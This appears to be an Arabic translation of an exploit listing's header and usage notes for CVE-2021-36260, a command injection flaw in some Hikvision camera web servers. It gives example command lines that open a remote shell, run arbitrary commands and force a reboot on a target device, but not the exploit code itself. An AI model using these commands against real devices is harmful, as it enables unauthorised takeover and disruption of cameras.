
ثغرة حقن الأوامر في خادم الويب لبعض منتجات Hikvision. بسبب عدم كفاية التحقق من الإدخال، يمكن للمهاجم استغلال الثغرة لشن هجوم حقن الأوامر عن طريق إرسال بعض الرسائل بأوامر ضارة.
ثغرة حقن أوامر CVE-2021-36260 POC في خادم الويب لبعض منتجات Hikvision. بسبب عدم كفاية التحقق من صحة الإدخال، يمكن للمهاجم استغلال الثغرة لشن هجوم حقن أوامر عن طريق إرسال بعض الرسائل بأوامر ضارة.
عنوان الاستغلال: Hikvision Web Server Build 210702 - حقن أوامر
مؤلف الاستغلال: bashis
الصفحة الرئيسية للبائع: https://www.hikvision.com/
الإصدار: 1.0
CVE: CVE-2021-36260
المرجع: https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html
ملاحظة:
[أمثلة] الفحص الآمن للثغرة/التحقق: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check
الفحص الآمن وغير الآمن للثغرة/التحقق: (سيستخدم فقط 'الفحص غير الآمن' إذا لم يتم التحقق بواسطة 'الفحص الآمن') $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check --reboot
الفحص غير الآمن للثغرة/التحقق: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --reboot
تشغيل والاتصال بقشرة SSH: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --shell
تنفيذ أمر: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd "ls -l"
تنفيذ أمر أعمى: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd_blind "reboot"